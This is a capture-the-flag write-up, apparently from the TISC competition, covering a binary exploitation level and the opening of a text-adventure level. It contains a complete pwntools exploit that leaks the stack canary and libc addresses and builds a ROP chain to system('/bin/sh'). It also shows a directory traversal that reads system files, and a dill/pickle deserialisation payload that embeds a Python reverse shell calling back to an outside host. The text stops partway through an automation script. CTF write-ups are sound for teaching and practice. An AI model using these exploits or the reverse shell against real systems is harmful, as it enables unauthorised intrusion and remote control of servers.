char __fastcall xor_passphrase_with_sanity_input(_BYTE *passphrase_data)
{
  char result; // al
  _BYTE *v2; // rax
  _BYTE *passphrase_data_2; // [rsp+0h] [rbp-18h]
  _BYTE *v4; // [rsp+10h] [rbp-8h]

  passphrase_data_2 = passphrase_data;
  v4 = sanity_test_input;
  result = *passphrase_data;
  if ( *passphrase_data )
  {
    result = *(_BYTE *)sanity_test_input;
    if ( *(_BYTE *)sanity_test_input )
    {
      do
      {
        if ( !*v4 )
          v4 = sanity_test_input;
        v2 = v4++;
        *passphrase_data_2++ ^= *v2;
        result = *passphrase_data_2 != 0;
      }
      while ( *passphrase_data_2 );
    }
  }
  return result;
}
This behaviour resembled an information leak, so perhaps the actual vulnerability occurred in the sanity test. Remember the suspicious series of memcpys?
I started the application in gdb with the pwndbg extension and entered a long series of As for the sanity test. I got a crash and traced it back to the first memcpy. The arguments to memcpy were overwritten by my input:
dest: 0x4141414141414141 ('AAAAAAAA')
src: 0x4141414141414141 ('AAAAAAAA')
n: 0x41414141 ('AAAA')
This looked like a powerful write-what-where gadget! However, exploitation would not be easy. I ran checksec and confirmed that all possible memory protections were turned on, ruling out a simple return pointer overwrite exploit.
pwndbg> checksec
[*] '/home/kali/Desktop/tisc/8_get_shwifty/1adb53a4b156cef3bf91c933d2255ef30720c34f'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
I took a closer look at the sanity test pseudocode to figure out another way to exploit this overwrite.
void *v0; // rsp
void *v1; // rsp
void *v2; // rsp
int v4; // [rsp+14h] [rbp-24h] BYREF
void *s; // [rsp+18h] [rbp-20h]
void *src; // [rsp+20h] [rbp-18h]
void *dest; // [rsp+28h] [rbp-10h]
unsigned __int64 v8; // [rsp+30h] [rbp-8h]
v8 = __readfsqword(0x28u);
++dword_5580E5357280;
v4 = 32;
v0 = alloca(48LL);
s = (void *)(16 * (((unsigned __int64)&v4 + 3) >> 4));
v1 = alloca(48LL);
src = s;
v2 = alloca(48LL);
dest = s;
memset(s, 0, v4);
memset(src, 0, v4);
memset(dest, 0, v4);
std::operator>><char,std::char_traits<char>>(&std::cin, src);
memcpy(dest, src, v4);
memcpy(s, dest, v4 / 2);
sanity_test_input = malloc(v4 - 1);
memcpy(sanity_test_input, s, v4 - 1);
sanity_test_result = *((_BYTE *)s + v4 - 1);
return 0LL;
The alloca and memcpy calls were run in a precise order. I set a breakpoint at the first memcpy and triggered the overflow again to analyse the stack. After a few repetitions, I figured out how the overflow worked. At the memcpy breakpoint, the stack looked like this:
00: 0x00000000 0x00000000 0x00000000 0x00000000 < *1st memcpy dst / *2nd memcpy src
10: 0x00000000 0x00000000 0x00000000 0x00000000
20: 0x00000000 0x00000000 0xaf79a963 0x00007fab
30: 0x41414141 0x41414141 0x41414141 0x41414141 < *1st memcpy src / start of user-controlled input
40: 0x41414141 0x41414141 0x41414141 0x41414141
50: 0x41414141 0x41414141 0x41414141 0x41414141
60: 0x41414141 0x41414141 0x41414141 0x41414141 < *2nd memcpy dst
70: 0x41414141 0x41414141 0x41414141 0x41414141
80: 0x41414141 0x41414141 0x41414141 0x41414141
90: 0x41414141 0x41414141 0x41414141 0x00000030 < 12 bytes | 1st memcpy n / 2nd memcpy n * 2 / 3rd memcpy n + 1
a0: 0x5d7d2b60 0x00007ffc 0x5d7d2b30 0x00007ffc < 2nd memcpy dst / 3rd memcpy src | 1st memcpy src
b0: 0x5d7d2b00 0x00007ffc 0x48531900 0xa14ea5c4 < 1st memcpy dst / 2nd memcpy src | stack canary
c0: 0x5d7d2bf0 0x00007ffc 0x86bfeea2 0x0000563e < 8 bytes | return pointer
d0: 0x86c00010 0x0000563e 0x86bfd540 0x0001013e
e0: 0x86c01956 0x0000563e 0x48531900 0xa14ea5c4
If I overwrote every byte up to the return pointer, I would also overwrite the stack canary, which triggered an error. However, remember how the inputs for the “Get Recruited” functions were XORed with sanity_test_input? Since I controlled each of the three memcpys' arguments via the overwrite, I could attempt to copy the stack canary into sanity_test_input using the third memcpy, then retrieve the XORed canary via the “Show what you have for the Cromulon currently” function.
Initially, I planned to overwrite the bytes up till the first memcpy's n argument and set n to a large enough number to also copy over the stack canary bytes. However, since the second memcpy used n / 2 for the size argument, to ensure that the canary was copied over in the second memcpy, n needed to be so large that the first memcpy would already overwrite the stack canary. Worse, I also realised that the copied bytes had to be null-free, because the xor_passphrase_with_sanity_input function only XORed the appended strings up till the first null byte in sanity_test_input. It dawned on me that I had to thread a very fine needle; this challenge was surgically designed.
(I would later learn that this was in fact the hardest possible way I could have solved this challenge; there was a simpler stack setup as well as a heap exploit route but clearly I wanted to suffer more.)
In order to properly leak data from the stack, I needed to overwrite the bytes in such a way that the 3rd memcpy copied stack bytes into sanity_test_input that would both pass the sanity test AND be XORed later on. I tested various permutations of overwritten bytes, using pwntools to speed up my work. To quickly debug the program, I wrote a Bash one-liner: gdb ./1adb53a4b156cef3bf91c933d2255ef30720c34f $(ps aux | grep ./1adb53a4b156cef3bf91c933d2255ef30720c34f | grep -v grep | cut -d ' ' -f9). This would hook onto the running instance created by my pwntools script.
After painstakingly trying hundreds of different inputs over several hours, I eventually figured out an overwrite that would get the result I wanted. By crafting my payload with precise offsets, I could manipulate the first two memcpys such that I overwrote the last byte of the 3rd memcpy's src argument on the stack. With luck, the overwritten byte would cause src to point to the return address or any other desired value such as the canary. I needed luck because the stack addresses changed each time the binary was executed. As such, I had to brute force the correct offset.
It may be easier to explain this by stepping through each memcpy, so let's get right into it.
I prepared my payload like this:
payload = b'B' * 60 # offset
payload += b'\x11\x00\x00\x00' # third memcpy n; vary this until sanity test passes
payload += packing.p8(return_pointer_offset) # candidate offset to return pointer on stack
payload += b'B' * 43 # more offset
payload += b'\x82' # first memcpy n / second memcpy n * 2
p.sendline(payload)
With this payload, the stack BEFORE the first memcpy looked like this:
75d0: 0x00000000 0x00000000 0x00000000 0x00000000 < *1st memcpy dst / *2nd memcpy src
75e0: 0x00000000 0x00000000 0x00000000 0x00000000
75f0: 0x00000000 0x00000000 0x656c2963 0x00007fca < 8 null bytes | libc_write+19
7600: 0x41414141 0x41414141 0x41414141 0x41414141 < *1st memcpy src / start of user-controlled input
7610: 0x41414141 0x41414141 0x41414141 0x41414141
7620: 0x41414141 0x41414141 0x41414141 0x41414141
7630: 0x41414141 0x41414141 0x41414141 0x00000011 < *2nd memcpy dst
7640: 0x424242XX 0x41414141 0x41414141 0x41414141 < candidate XX offset
7650: 0x41414141 0x41414141 0x41414141 0x41414141
7660: 0x41414141 0x41414141 0x41414141 0x00000082 < 12 filler bytes | 1st memcpy n / 2nd memcpy n * 2 / 3rd memcpy n + 1
7670: 0xb5617630 0x00007ffc 0xb5617600 0x00007ffc < 2nd memcpy dst / 3rd memcpy src | 1st memcpy src
7680: 0xb56175d0 0x00007ffc 0xd1686300 0x697ee648 < 1st memcpy dst / 2nd memcpy src | stack canary
7690: 0xb56176c0 0x00007ffc 0x2b782ea2 0x00005597 < stack pointer | return pointer
76a0: 0x2b784010 0x00005597 0x2b781540 0x00010197 < _libc_csu_init | unknown bytes
76b0: 0x2b785956 0x00005597 0xd1686300 0x697ee648 < aShowMeWhatYouG | unknown bytes
76c0: 0x2b784010 0x00005597 0x655fbe4a 0x00007fca < _libc_csu_init | __libc_start_main+234
Thanks to the overflow from receiving user input, I overwrote the value of n on the stack to \x82. This caused the first memcpy to copy both my original input and additional bytes on the stack to *1st memcpy dst. The stack AFTER the first memcpy and BEFORE the second memcpy now looked like this:
75d0: 0x41414141 0x41414141 0x41414141 0x41414141 < *2nd memcpy src
75e0: 0x41414141 0x41414141 0x41414141 0x41414141
75f0: 0x41414141 0x41414141 0x41414141 0x41414141
7600: 0x41414141 0x41414141 0x41414141 0x00000011
7610: 0x424242XX 0x41414141 0x41414141 0x41414141 < candidate XX offset
7620: 0x41414141 0x41414141 0x41414141 0x41414141
7630: 0x41414141 0x41414141 0x41414141 0x00000082 < *2nd memcpy dst
7640: 0xb5617630 0x00007ffc 0xb5617600 0x00007ffc
7650: 0x424275d0 0x41414141 0x41414141 0x41414141
7660: 0x41414141 0x41414141 0x41414141 0x00000082 < 12 filler bytes | 2nd memcpy n * 2 / 3rd memcpy n + 1
7670: 0xb5617630 0x00007ffc 0xb5617600 0x00007ffc < 2nd memcpy dst / 3rd memcpy src | 1st memcpy src
7680: 0xb56175d0 0x00007ffc 0xd1686300 0x697ee648 < 2nd memcpy src | stack canary
7690: 0xb56176c0 0x00007ffc 0x2b782ea2 0x00005597 < stack pointer | return pointer
76a0: 0x2b784010 0x00005597 0x2b781540 0x00010197 < _libc_csu_init | unknown bytes
76b0: 0x2b785956 0x00005597 0xd1686300 0x697ee648 < aShowMeWhatYouG | unknown bytes
76c0: 0x2b784010 0x00005597 0x655fbe4a 0x00007fca < _libc_csu_init | __libc_start_main+234
Nothing too special. However, the magic happened in the next memcpy. The stack AFTER the second memcpy and BEFORE the third memcpy looked like this:
75d0: 0x41414141 0x41414141 0x41414141 0x41414141
75e0: 0x41414141 0x41414141 0x41414141 0x41414141
75f0: 0x41414141 0x41414141 0x41414141 0x41414141
7600: 0x41414141 0x41414141 0x41414141 0x00000011
7610: 0x424242XX 0x41414141 0x41414141 0x41414141
7620: 0x41414141 0x41414141 0x41414141 0x41414141
7630: 0x41414141 0x41414141 0x41414141 0x41414141
7640: 0x41414141 0x41414141 0x41414141 0x41414141
7650: 0x41414141 0x41414141 0x41414141 0x41414141
7660: 0x41414141 0x41414141 0x41414141 0x00000011 < 12 filler bytes | 3rd memcpy n + 1
7670: 0xb56176XX 0x00007ffc 0xb5617600 0x00007ffc < 3rd memcpy src | 1st memcpy src
7680: 0xb56175d0 0x00007ffc 0xd1686300 0x697ee648 < 2nd memcpy src | stack canary
7690: 0xb56176c0 0x00007ffc 0x2b782ea2 0x00005597 < stack pointer | return pointer
76a0: 0x2b784010 0x00005597 0x2b781540 0x00010197 < _libc_csu_init | unknown bytes
76b0: 0x2b785956 0x00005597 0xd1686300 0x697ee648 < aShowMeWhatYouG | unknown bytes
76c0: 0x2b784010 0x00005597 0x655fbe4a 0x00007fca < _libc_csu_init | __libc_start_main+234
I overwrote two important values:
- The n used to generate the 3rd memcpy's size argument (n-1) to 0x11.
- The last byte of the 3rd memcpy's src argument to my candidate byte offset 0xXX.
When my brute force set the candidate byte to 0x98, the 3rd memcpy's src pointed to the stack address of the return pointer (0x7ffcb5617698), allowing me to copy the return pointer address to sanity_test_input. The overwritten n also set sanity_test_result to *0x7ffcb56176a8 = 0x40, which passed the sanity test. After that, I could simply enter a string of length 0x11 like 1111111111111111 at the “Get Recruited” prompt, which XORed the stored sanity_test_input. I could then run “Show what you have for the Cromulon currently” to output the result and XOR it with 1111111111111111 again to retrieve the return pointer value.
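The decoding relies on a simple XOR round-trip: the game stores my passphrase XORed into sanity_test_input, so XORing the printed bytes with the same passphrase restores the raw pointer bytes. A minimal sketch (the pointer bytes here are an arbitrary example, not the real leak):

```python
def byte_xor(ba1, ba2):
    # Pairwise XOR of two byte strings, truncated to the shorter one
    return bytes(a ^ b for a, b in zip(ba1, ba2))

key = b'1111111111111111'                # the passphrase I typed in
secret = b'\xa2\x2e\x78\x2b\x97\x55'     # example pointer bytes on the stack
printed = byte_xor(secret, key)          # what the game outputs after XOR
assert byte_xor(printed, key) == secret  # XOR again recovers the pointer
```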
If the candidate offset correctly retrieved the return pointer, the first retrieved byte would be the return pointer's last byte. This seemed to always match 0xa2, so I used this constant to check for a successful candidate. There was a chance that no valid candidates existed; if the return pointer was at 0x7ffcb5617708 but the 3rd memcpy src value was originally set to 0x7ffcb56176X8, I could only brute force the last byte up to 0x7ffcb56176f8. In this case, I simply needed to run the exploit again and hope to get lucky.
I subtracted a fixed offset (0x3EA2) from the return pointer value to get the base address of the executable. Additionally, now that I knew the offset in the stack to the return pointer, I could add or subtract from it accordingly to retrieve other interesting values on the stack, such as __libc_start_main+234, the stack canary, and a valid stack pointer.
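The arithmetic itself is straightforward; with an illustrative leaked return pointer (not the real runtime value), the base-address calculation looks like:

```python
return_pointer = 0x55972B782EA2      # illustrative leaked return address
base_addr = return_pointer - 0x3EA2  # fixed offset of the return site within the binary
assert base_addr == 0x55972B77F000
assert base_addr % 0x1000 == 0       # sanity check: an ELF load base is page-aligned
```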
With those values, I could send a large input with the proper stack canary and overwrite the return pointer with my desired function pointer, such as system in libc. I avoided crashing the three memcpys by overwriting the src and dest arguments with the leaked valid stack addresses and setting the size argument to something small like 1.
At first, I tried to return to an interesting function in the binary that printed the flag:
__int64 read_flag()
{
  char v1; // [rsp+Fh] [rbp-231h] BYREF
  char v2[264]; // [rsp+10h] [rbp-230h] BYREF
  _QWORD v3[37]; // [rsp+118h] [rbp-128h] BYREF

  v3[34] = __readfsqword(0x28u);
  std::fstream::basic_fstream(v2);
  std::fstream::open(v2, "/root/f1988cec5de9eaa97ab11740e10b1fc8d6db8123", 8LL);
  if ( (unsigned __int8)std::ios::operator!(v3) )
  {
    std::operator<<<std::char_traits<char>>(&std::cout, "No such file\n");
  }
  else
  {
    while ( 1 )
    {
      std::operator>><char,std::char_traits<char>>(v2, &v1);
      if ( (unsigned __int8)std::ios::eof(v3) )
        break;
      std::operator<<<std::char_traits<char>>(&std::cout, (unsigned int)v1);
    }
    std::operator<<<std::char_traits<char>>(&std::cout, "\n");
  }
  std::fstream::close(v2);
  std::fstream::~fstream(v2);
  return 0LL;
}
However, despite the exploit working locally, I could not get it to work remotely. I assumed that this was because the executable crashed too quickly to return output over the network. As such, I decided to go the ret2libc route and get a shell by adding system to the call stack. Since the offsets in libc varied widely across versions, I used the file disclosure vulnerability from earlier to leak /proc/self/maps and /etc/os-release to determine the exact OS and libc versions, which were “Ubuntu 20.04.3 LTS (Focal Fossa)” and libc-2.31.so respectively. Since Googling the server's IP address revealed that it belonged to a DigitalOcean Singapore cluster, I spun up a free Droplet instance in the same cluster with the matching OS version to retrieve the offsets. This turned out to be a hidden bonus: the proximity of my Droplet to the target server allowed my exploit to catch the shell before the program crashed.
Finally, I needed to pop the pointer to /bin/sh in libc into RDI before calling system, because the x64 calling convention passes the first argument in RDI. I used rp++ to dump ROP gadgets from the binary and added a POP RDI; RET gadget to the overwritten call stack.
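The chain layout can be sketched with plain struct packing (all addresses below are illustrative stand-ins): pop rdi; ret takes the next quadword off the stack into RDI, then its ret lands in system with RDI pointing at "/bin/sh".

```python
import struct

pop_rdi_ret = 0x0000559700005073  # illustrative gadget address in the binary
bin_sh_ptr  = 0x00007FCA655B75AA  # illustrative address of "/bin/sh" in libc
system_addr = 0x00007FCA655A5410  # illustrative address of system() in libc

# Overwritten return address -> gadget; the gadget pops bin_sh_ptr into RDI,
# then returns into system("/bin/sh")
chain = struct.pack('<QQQ', pop_rdi_ret, bin_sh_ptr, system_addr)
assert len(chain) == 24  # three little-endian quadwords
```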
At long last, I completed my full exploit code:
from pwn import *
p = remote('<IP ADDRESS>', 53619)
##p = process('./1adb53a4b156cef3bf91c933d2255ef30720c34f')
def byte_xor(ba1, ba2):
return bytes([_a ^ _b for _a, _b in zip(ba1, ba2)])
## leak base_addr of executable
return_pointer_offset = 8
while True:
    # send payload
    p.recvuntil("> ")
    p.sendline(b'1')
    payload = b'B' * 60 # offset
    payload += b'\x11\x00\x00\x00' # third memcpy n; vary this until sanity test passes
    payload += packing.p8(return_pointer_offset) # candidate offset to return pointer on stack
    payload += b'B' * 43 # more offset
    payload += b'\x82' # first memcpy n / second memcpy n * 2
    p.sendline(payload)
    # retrieve sanity_test_input
    p.recvuntil("> ")
    p.sendline(b'2')
    if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
        p.sendline(b'1111111111111111')
        p.recvuntil("> ")
        p.sendline(b'4')
        p.recvuntil("`======/")
        p.recvline()
        candidate = p.recvline()
        print(candidate.hex())
        if 0x93 == candidate[0]: # confirm that this is a leaked function address; last byte is 0xa2 == 0x93 XOR 0x31
            base_addr = (int.from_bytes(byte_xor(candidate[:6][::-1], b'111111'), 'big', signed=False) - 0x3EA2).to_bytes(8, byteorder='big', signed=False)
            log.info('Base address: {}'.format(base_addr.hex()))
            p.recvuntil("> ")
            p.sendline(b'6')
            break
    p.recvuntil("> ")
    p.sendline(b'6')
    return_pointer_offset += 16
libc_start_main_plus_234_offset = return_pointer_offset + 0x30 # offset in stack from return pointer to __libc_start_main+234
canary_offset = return_pointer_offset - 0x10 + 1 # offset in stack from return pointer to canary + 1 (skip null byte)
stack_address_offset = return_pointer_offset - 0x18 # offset in stack from return pointer to a saved stack pointer
if stack_address_offset < 0 or libc_start_main_plus_234_offset > 255:
log.error("Base offset is too low")
## leak canary
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 60 # offset
payload += b'\x11\x00\x00\x00' # ensures that sanity_test_result passes
payload += packing.p8(canary_offset)
payload += b'B' * 43
payload += b'\x82'
p.sendline(payload)
p.recvuntil("> ")
p.sendline(b'2')
if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
    p.sendline(b'1111111111111111')
    p.recvuntil("> ")
    p.sendline(b'4')
    p.recvuntil("`======/")
    p.recvline()
    candidate = p.recvline()
    canary = byte_xor(candidate[:7][::-1], b'1111111') + b'\x00' # restore null last byte
    log.info("Canary: {}".format(canary.hex()))
    p.recvuntil("> ")
    p.sendline(b'6')
## leak libc_main_plus_234
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 60 # offset
payload += b'\x11\x00\x00\x00' # ensures that sanity_test_result == B which passes test4 #21 for local
payload += packing.p8(libc_start_main_plus_234_offset)
payload += b'B' * 43
payload += b'\x82'
p.sendline(payload)
p.recvuntil("> ")
p.sendline(b'2')
if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
    p.sendline(b'1111111111111111')
    p.recvuntil("> ")
    p.sendline(b'4')
    p.recvuntil("`======/")
    p.recvline()
    candidate = p.recvline()
    libc_main_plus_234 = b'\x00\x00' + byte_xor(candidate[:6][::-1], b'111111')
    log.info('libc_main_plus_234 address: {}'.format(libc_main_plus_234.hex()))
    p.recvuntil("> ")
    p.sendline(b'6')
## leak stack address
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 60 # offset
payload += b'\x19\x00\x00\x00' # ensures that sanity_test_result passes test4
payload += packing.p8(stack_address_offset)
payload += b'B' * 43
payload += b'\x82'
p.sendline(payload)
p.recvuntil("> ")
p.sendline(b'2')
if b'To get recruited, you need to provide the correct passphrase for the Cromulon.' in p.recvline():
    p.sendline(b'1111111111111111')
    p.recvuntil("> ")
    p.sendline(b'4')
    p.recvuntil("`======/")
    p.recvline()
    candidate = p.recvline()
    stack_address = b'\x00\x00' + byte_xor(candidate[:6][::-1], b'111111')
    log.info('Stack address: {}'.format(stack_address.hex()))
    p.recvuntil("> ")
    p.sendline(b'6')
## prepare addresses
flag_function_address = (int.from_bytes(base_addr, 'big', signed=False) + 0x3BBC).to_bytes(8, byteorder='big', signed=False)
log.info('Flag function address: {}'.format(flag_function_address.hex()))
get_recruited_address = (int.from_bytes(base_addr, 'big', signed=False) + 0x3606).to_bytes(8, byteorder='big', signed=False)
log.info('get_recruited function address: {}'.format(get_recruited_address.hex()))
pop_rdi_ret = (int.from_bytes(base_addr, 'big', signed=False) + 0x5073).to_bytes(8, byteorder='big', signed=False)
log.info('pop_rdi_ret address: {}'.format(pop_rdi_ret.hex()))
libc_base_addr = (int.from_bytes(libc_main_plus_234, 'big', signed=False) - 0x270B3).to_bytes(8, byteorder='big', signed=False)
log.info('libc_base_addr address: {}'.format(libc_base_addr.hex()))
libc_system_addr = (int.from_bytes(libc_base_addr, 'big', signed=False) + 0x55410).to_bytes(8, byteorder='big', signed=False)
log.info('libc_system_addr: {}'.format(libc_system_addr.hex()))
libc_bin_sh_addr = (int.from_bytes(libc_base_addr, 'big', signed=False) + 0x1B75AA).to_bytes(8, byteorder='big', signed=False)
log.info('libc_bin_sh_addr: {}'.format(libc_bin_sh_addr.hex()))
dec_ecx_ret = (int.from_bytes(base_addr, 'big', signed=False) + 0x2AE2).to_bytes(8, byteorder='big', signed=False)
## prepare final payload
p.recvuntil("> ")
p.sendline(b'1')
payload = b'B' * 108 # offset
payload += b'\x01\x00\x00\x00' # n
payload += stack_address[::-1] # valid stack address
payload += stack_address[::-1] # valid stack address
payload += stack_address[::-1] # valid stack address
payload += canary[::-1] # valid canary
payload += b'A' * 8 # offset
payload += flag_function_address[::-1] # try to call flag function - somehow this doesn't work remotely?
payload += pop_rdi_ret[::-1] # ROP to pop pointer to "/bin/sh" to RDI
payload += libc_bin_sh_addr[::-1] # pointer to "/bin/sh"
payload += libc_system_addr[::-1] # pointer to system
## send final payload
print(p.recvline())
print(p.recv())
p.sendline(payload)
p.interactive()
I ran this several times on my Droplet instance and eventually got my shell.
TISC{30e903d64775c0120e5c244bfe8cbb0fd44a908b}
Level 9: 1865 Text Adventure
This was my favourite level and felt like a digital work of art. I loved the storyline, and although one of its listed domains was Pwn, it was actually Web, as you will soon see. Finally, it involved a lot of code review, which I enjoyed.
It began with a tumble...
Part 1: Down the Rabbit Hole
Domains: Pwn, Cryptography
Text adventures are fading ghosts of a faraway past but this one looks suspiciously brand new... and it has the signs of PALINDROME all over it.
Our analysts believe that we need to learn more about the White Rabbit but when we connect to the game, we just keep getting lost!
Can you help us access the secrets left in the Rabbit's burrow?
The game is hosted at 165.22.48.155:26181.
No kernel exploits are required for this challenge.
Connecting to <IP ADDRESS>:26181 kicked off a long, scrolling text adventure. I could look around my location, move to another exit, read notes, or get items. I set about enumerating every path in the text adventure. Along the way, I picked up several useful items:
- The Pocket Watch: This gave me access to an options menu, which I used to turn off the annoying scrolling text.
- The Looking Glass: This gave me the ability to teleport to other locations in the story, e.g. teleport bottom-of-a-pit/deeper-into-the-burrow.
- The Golden Hookah: This gave me the ability to save messages... somewhere, via blowsmoke <NAME> <MESSAGE>.
After a few twists and turns, the text adventure reached a dead end.
[cosmic-desert] move tear-in-the-rift
You have moved to a new location: 'tear-in-the-rift'.
You look around and see:
A curious light shines in the distance. You cannot quite reach it though.
Music tinkles through the rift:
A very merry unbirthday
To you
Who, me?
Yes, you
Oh, me
Let's all congratulate us with another cup of tea
A very merry unbirthday to you
There are the following things here:
* README (note)
[tear-in-the-rift] read README
You read the writing on the note:
Do you hear that? What lovely party sounds!
Wouldn't it be lovely to crash it and get some tea and crumpets?
Too bad you're stuck here!
You can cage a swallow, can't you, but you can't swallow a cage, can you?
Fly back to school now, little starling.
- PALINDROME
With nowhere left to go, I began messing about with the items. My first clue surfaced when I used the Golden Hookah to send a message with a format string.
[tear-in-the-rift] blowsmoke spaceraccoon %s
Smoke bellows from the lips of spaceraccoon to form the words, "%s."
Curling and curling...
Traceback (most recent call last):
File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 708, in run_game
self.evaluate(user_line)
File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 627, in evaluate
cmd.run(args)
File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 511, in run
response = urlopen(url)
File "/usr/lib/python3.8/urllib/request.py", line 222, in urlopen
return opener.open(url, data, timeout)
File "/usr/lib/python3.8/urllib/request.py", line 531, in open
response = meth(req, response)
File "/usr/lib/python3.8/urllib/request.py", line 640, in http_response
response = self.parent.error(
File "/usr/lib/python3.8/urllib/request.py", line 569, in error
return self._call_chain(*args)
File "/usr/lib/python3.8/urllib/request.py", line 502, in _call_chain
result = func(*args)
File "/usr/lib/python3.8/urllib/request.py", line 649, in http_error_default
raise HTTPError(req.full_url, code, msg, hdrs, fp)
urllib.error.HTTPError: HTTP Error 400: Bad Request
The Python backend was trying to send an HTTP request containing my message! However, further experimentation with traversal and command injection payloads failed to yield any results. I moved on to The Looking Glass. I attempted several invalid inputs, including a long string:
[cosmic-desert] teleport vast-emptiness/eternal-desolation/cosmic-desert/<A * 200>
Traceback (most recent call last):
File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 708, in run_game
self.evaluate(user_line)
File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 627, in evaluate
cmd.run(args)
File "/opt/wonderland/down-the-rabbithole/rabbithole.py", line 475, in run
if rel_path.exists() and rel_path.is_dir():
File "/usr/lib/python3.8/pathlib.py", line 1407, in exists
self.stat()
File "/usr/lib/python3.8/pathlib.py", line 1198, in stat
return self._accessor.stat(self)
OSError: [Errno 36] File name too long: '/opt/wonderland/down-the-rabbithole/stories/vast-emptiness/eternal-desolation/cosmic-desert/<A * 200>'
This looked like a directory traversal! Perhaps teleporting meant moving to a different folder location in the server. I took the next obvious step.
[tear-in-the-rift] teleport ../../../../etc
You have moved to a new location: 'etc'.
You look around and see:
Darkness fills your senses. Nothing can be discerned from your environment.
There are the following things here:
* environment (note)
* fstab (note)
* networks (note)
* mke2fs.conf (note)
* ld.so.conf (note)
* passwd (note)
* shells (note)
* debconf.conf (note)
* ld.so.cache (note)
* legal (note)
* xattr.conf (note)
* hostname (note)
* e2scrub.conf (note)
* issue (note)
* bindresvport.blacklist (note)
...
Bingo! Now that I was in a different folder, I could read files with the read command. After enumerating various locations, I ended up in /home/rabbit, which contained the first flag.
[mouse] teleport ../../../../home/rabbit
You have moved to a new location: 'rabbit'.
You look around and see:
You enter the Rabbit's burrow and find it completely ransacked. Scrawled across the walls of the
tunnel is a message written in blood: 'Murder for a jar of red rum!'.
Your eyes are drawn to a twinkling letter and lockbox that shines at you from the dirt.
There are the following things here:
* flag2.bin (note)
* flag1 (note)
[rabbit] read flag1
You read the writing on the note:
TISC{r4bbb1t_kn3w_1_pr3f3r_p1}
TISC{r4bbb1t_kn3w_1_pr3f3r_p1}
Part 2: Pool of Tears
It looks like the Rabbit knew too much about PALINDROME. Within his cache of secrets lies a special device that might just unlock clues to tracking down the elusive trickster. However, our attempts to read it yield pure gibberish.
It appears to require... activation. To activate it, we must first become the Rabbit.
Please assume the identity of the Rabbit.
The challenge description hinted that I needed to get a working shell as rabbit to execute flag2.bin. I returned to the /opt/wonderland/down-the-rabbithole folder that contained the Python source code for the text adventure. rabbithole.py contained most of the game logic. Right away, I noticed that it imported pickletools and used Python object deserialisation (dill.loads) to “get” items.
def run(self, args):
    if len(args) < 2:
        letterwise_print("You don't see that here.")
        return
    for i in self.game.get_items():
        if (args[1] + '.item') == i.name and args[1] not in self.game.inventory:
            got_something = True
            # Check that the item must be serialised with dill.
            item_data = open(i, 'rb').read()
            if not self.validate_stream(item_data):
                letterwise_print('Seems like that item may be an illusion.')
                return
            item = dill.loads(item_data)
            letterwise_print("You pick up '{}'.".format(item.key))
            self.game.inventory[item.key] = item
            item.prepare(self.game)
            item.on_get()
            return
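As a generic illustration of why this is dangerous (standard pickle shown here; dill behaves the same way on load), deserialising attacker-controlled data runs whatever the object's __reduce__ asks for:

```python
import pickle

class Evil:
    def __reduce__(self):
        # On loads(), pickle calls eval("6*7") — a harmless stand-in for arbitrary code
        return (eval, ("6*7",))

blob = pickle.dumps(Evil())
assert pickle.loads(blob) == 42  # merely "loading" the item executed our expression
```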
Since Python object deserialisation was an easy code execution vector, I focused on this lead. How could I create a pickle file on the server to “get” later? Enumerating more folders, I realised that /opt/wonderland contained the source code of two other applications:
[..] teleport ../..
You have moved to a new location: '..'.
You look around and see:
Darkness fills your senses. Nothing can be discerned from your environment.
You see exits to the:
* logs
* pool-of-tears
* a-mad-tea-party
* down-the-rabbithole
* utils
a-mad-tea-party turned out to be a Java application, while pool-of-tears contained a Ruby on Rails web API. In logs, I found some of the messages I sent using blowsmoke earlier. This suggested that blowsmoke enabled me to write files – exactly what I needed.
To prepare my pickle, I referred to the generate_items.py script from the source code of down-the-rabbithole. The application validated items by checking for rabbithole, dill._dill, and on_get properties, so I reused the code to meet these requirements with one important difference – my payload generation script inserted a Python reverse shell in on_get.
import dill
import types
from rabbithole import Item
import socket
import os
import pty
import urllib.parse

dill.settings['recurse'] = True

def write_object(location, obj):
    '''Writes an object to the specified location.'''
    with open(location, 'wb') as f:
        dill.dump(obj, f, recurse=True)

def make_item(key, on_get):
    '''Makes a new item dynamically.'''
    item = Item(key)
    item.on_get = types.MethodType(on_get, item)
    return item

def payload_on_get(self):
    '''Spawn a reverse shell when the item is picked up.'''
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("<IP ADDRESS>", 4242))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    pty.spawn("/bin/sh")

def setup_payload():
    item = make_item('payload', payload_on_get)
    write_object('payload.item', item)

if __name__ == '__main__':
    setup_payload()
    # open_payload()
    with open('payload.item', 'rb') as file:
        print("Generated {}".format(urllib.parse.quote(file.read())))
After generating the URL-encoded payload, I sent it off with blowsmoke a.item <URL-ENCODED PAYLOAD>. This saved the payload to /opt/wonderland/logs/tear-in-the-rift-a.item. Finally, in the text adventure game, I teleported to /opt/wonderland/logs and ran get tear-in-the-rift-a to execute the payload. To save time, I automated the entire process with pwntools.
from pwn import *
import urllib.parse
p = remote('<IP ADDRESS>', 26181)
print(p.recvuntil(b']'))
p.sendline(b'move a-shallow-deadend')
print(p.recvuntil(b']'))
p.sendline(b'get pocket-watch')
print(p.recvuntil(b']'))
p.sendline(b'options text_scroll False')
print(p.recvuntil(b']'))
p.sendline(b'back')
print(p.recvuntil(b']'))
p.sendline(b'move deeper-into-the-burrow')
print(p.recvuntil(b']'))
p.sendline(b'move a-curious-hall')
print(p.recvuntil(b']'))
p.sendline(b'get pink-bottle')
print(p.recvuntil(b']'))
p.sendline(b'move a-pink-door')
print(p.recvuntil(b']'))
p.sendline(b'move maze-entrance')
print(p.recvuntil(b']'))
p.sendline(b'move knotted-boughs')
print(p.recvuntil(b']'))
p.sendline(b'move dazzling-pines')
